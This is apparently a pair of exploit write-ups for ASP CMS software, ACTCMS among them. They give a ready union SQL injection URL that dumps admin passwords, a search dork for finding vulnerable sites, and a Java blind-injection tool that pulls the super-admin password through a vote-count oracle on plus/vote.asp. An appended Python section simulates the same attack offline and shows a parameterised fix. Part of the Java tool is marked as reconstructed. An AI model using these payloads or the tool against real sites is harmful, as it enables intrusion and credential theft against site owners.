1.
Vulnerability description:
User_Article.Asp is injectable, and the injection exposes the administrator password.
Usage:
http://localhost/User/User_Article.Asp?ModeID=1&action=adds&classid=-1'%20union%20select%201,2,3,4,5,admin_name%2B'|'%2Bpassword,7,8,9,10,11,12,13,14,15,16,17,18%20from%20admin_act%20where%20'1'='1
(Decoded: classid=-1' union select 1,2,3,4,5,admin_name+'|'+password,7,...,18 from admin_act where '1'='1. The query needs 18 columns, and the admin name and password come back joined by "|" in the sixth one.)
Baidu or Google search keyword: inurl:TypeClass.asp
========================================================== ======
2.
An ASP CMS program with a fairly small user base.
Google the keyword "Copyright @ 2006 www.actcms.com"; there are not too many hits.
Today I read the code.
Basically every parameter is filtered...
But there was a small problem in the voting feature,
on the /plus/vote.asp page.
The code is as follows:
ASP/Visual Basic code
....
If Request("voted").Count = 0 Then
    Response.Write "<script>alert('select the voting item.');window.close()</script>"
    Response.End
End If
' every value in the "voted" list is concatenated straight into the UPDATE's WHERE clause
For i = 1 To Request("voted").Count
    actcms.actexe("Update vote_act set VoteNum = VoteNum + 1 where id=" & Request("voted")(i))
Next
....
' the response is always a redirect, so nothing from the query is ever echoed
Response.Redirect "index.asp?id=" & id & ""
The id after "where id=" is taken straight from Request("voted") without any filtering, so whatever is appended to the voted parameter lands in the UPDATE's WHERE clause. Exploiting it is awkward, though, because the UPDATE is immediately followed by Response.Redirect: no matter what statement we construct behind it, the response is just a jump to the index.asp page. Nothing from the query is ever echoed, which is also why common tools do not recognize this injection point.
The only observable change is that, when the condition we construct is true, the number of votes goes up by one. That makes manual exploitation quite tedious. I tried some of the injection tools, such as mingxiao and pangolin, so I wrote a simple program myself; since I only know Java, it is written in Java. It is rough, but writing it this way was more convenient. It is slow.
The Code is as follows:
Java code
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.URLConnection;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class ActCmsGetPwd {
    // Candidate characters for each password position. The guess is compared
    // with mid(password,a,1) inside the WHERE clause, and the default Jet /
    // SQL Server collation is case-insensitive, so lower case is enough.
    public static char[] arr = { '0', '1', '2', '3', '4', '5', '6', '7', '8',
            '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',
            'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y',
            'z' };
    public static String siteurl = "";
    public static int voteid = 1;
    public static String charset = "";
    // ASSUMPTION: the original listing is cut off before the response is
    // parsed. This pattern simply grabs the first number in the page that
    // vote.asp redirects to and must be adapted to the HTML of
    // plus/vote/index.asp on the target (it has to capture option 3's count).
    public static Pattern voteNumPattern = Pattern.compile("(\\d+)");

    public static void main(String[] args) throws Exception {
        if (args.length < 4) {
            System.out.println("usage: java ActCmsGetPwd <siteurl> <voteid> <totalVoteNum> <charset>");
            System.out.println("siteurl: target site");
            System.out.println("voteid: voting id");
            System.out.println("totalVoteNum: current number of votes, see plus/vote/index.asp?id=<voteid>");
            System.out.println("charset: character set used by the target ACTCMS site, see the page source");
            System.out.println("eg: java ActCmsGetPwd http://www.abc.com 1 15 gb2312");
            return;
        }
        siteurl = args[0];
        voteid = Integer.parseInt(args[1]);
        int preVoteNum = Integer.parseInt(args[2]);
        charset = args[3];
        System.out.println("Code by Ninty, QQ 3191864");
        System.out.print("password is: ");
        // One position at a time. Every correct guess adds exactly one vote,
        // so the baseline moves up by one after each position is recovered.
        for (int i = 1; i <= 16; i++) {
            System.out.print(send(i, 0, preVoteNum));
            preVoteNum++;
        }
        System.out.println();
        System.out.println("Done!");
    }

    // Tries arr[b] as character a of the super-admin (supertf=1) password. The
    // condition is ANDed onto "where id=3", so the UPDATE only adds a vote when
    // the guess is right; a count above preVoteNum is the only signal we get.
    public static char send(int a, int b, int preVoteNum) throws Exception {
        if (b >= arr.length) {
            throw new Exception("no candidate matched for position " + a);
        }
        String sql = "%20and%20(select%20top%201%20mid(password," + a
                + ",1)%20from%20admin_act%20where%20supertf%20=%201)%20=%20'" + arr[b] + "'";
        URL u = new URL(siteurl + "/plus/vote.asp?dopost=send&id=" + voteid
                + "&ismore=0&voted=3" + sql);
        URLConnection conn = u.openConnection();
        // HttpURLConnection follows the redirect to index.asp by itself, so the
        // body we read is the page that shows the vote counts.
        BufferedReader in = new BufferedReader(
                new InputStreamReader(conn.getInputStream(), charset));
        StringBuilder html = new StringBuilder();
        String line;
        while ((line = in.readLine()) != null) {
            html.append(line).append('\n');
        }
        in.close();
        Matcher m = voteNumPattern.matcher(html);
        if (!m.find()) {
            throw new Exception("vote count not found in response from " + u);
        }
        int nowVoteNum = Integer.parseInt(m.group(1));
        if (nowVoteNum > preVoteNum) {
            return arr[b];   // the vote went up, so the guess was right
        }
        return send(a, b + 1, preVoteNum);   // otherwise try the next character
    }
}
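As an added, runnable illustration of the vote-count oracle described above (this is example code, not from the write-up and not ACTCMS's own code), the following Python script simulates plus/vote.asp against an in-memory SQLite database. The admin_act and vote_act table names, the supertf column and the "3 and (select ...)" payload shape follow the page; the password value, the vote counts and the second admin row are constructed sample data, and Jet's mid()/top 1 are written as SQLite's substr()/limit 1. It also shows the parameterised UPDATE that closes the hole, and that the same extraction loop learns nothing against it.

```python
import sqlite3
import string

# Constructed sample data standing in for ACTCMS's admin_act and vote_act
# tables. The site uses Access / SQL Server; SQLite is used here so the
# example runs offline. The password is made up (16 chars, like the loop
# in the Java tool).
SECRET = "5f4dcc3b5aa765d6"


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE admin_act (admin_name TEXT, password TEXT, supertf INTEGER);
        CREATE TABLE vote_act (id INTEGER PRIMARY KEY, VoteNum INTEGER);
        INSERT INTO admin_act VALUES ('admin', '%s', 1), ('editor', 'x', 0);
        INSERT INTO vote_act VALUES (1, 10), (2, 4), (3, 15);
    """ % SECRET)
    return db


def vote_vulnerable(db, voted):
    """Mirror of plus/vote.asp: the 'voted' value is concatenated into the
    UPDATE exactly as in actcms.actexe(...). Like the real page it returns
    nothing useful; the caller only ever sees a redirect."""
    db.execute("UPDATE vote_act SET VoteNum = VoteNum + 1 WHERE id=" + voted)


def vote_hardened(db, voted):
    """Fixed handler: the value is bound as a parameter and must be an int,
    so no SQL can ride in on it."""
    db.execute("UPDATE vote_act SET VoteNum = VoteNum + 1 WHERE id=?", (int(voted),))


def vote_count(db, option_id):
    """What plus/vote/index.asp?id=<voteid> shows to anyone, attacker included."""
    row = db.execute("SELECT VoteNum FROM vote_act WHERE id=?", (option_id,)).fetchone()
    return row[0]


def payload(position, guess):
    # Jet's  mid(password,a,1) / top 1  become SQLite's substr / limit 1.
    # Note SQLite compares strings case-sensitively, unlike the default
    # Jet / SQL Server collation, so the alphabet must match the stored case.
    return ("3 and (select substr(password,%d,1) from admin_act "
            "where supertf=1 limit 1)='%s'" % (position, guess))


def extract_password(db, vote_fn, length=16, option_id=3,
                     alphabet=string.digits + string.ascii_lowercase):
    """Boolean-blind extraction: one probe per candidate character, and the
    only signal is whether option 3's vote count went up by one."""
    recovered = ""
    for pos in range(1, length + 1):
        before = vote_count(db, option_id)
        found = None
        for ch in alphabet:
            try:
                vote_fn(db, payload(pos, ch))
            except (ValueError, sqlite3.Error):
                # the hardened handler rejects the payload outright
                return recovered
            if vote_count(db, option_id) > before:
                found = ch          # the UPDATE matched, so the guess was right
                break
        if found is None:
            break                   # character outside our alphabet
        recovered += found
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks:", extract_password(db, vote_vulnerable))
    print("option 3 count afterwards:", vote_count(db, 3))
    print("hardened handler leaks:", repr(extract_password(make_db(), vote_hardened)))
```

Each probe costs one request in the real tool and, as the write-up says, the only feedback is the count shown on index.asp, which is why the loop re-reads the count after every guess rather than looking at the response to vote.asp itself. Against the vulnerable handler the count for option 3 ends up exactly 16 higher than it started, one vote per recovered character; every wrong guess updates zero rows.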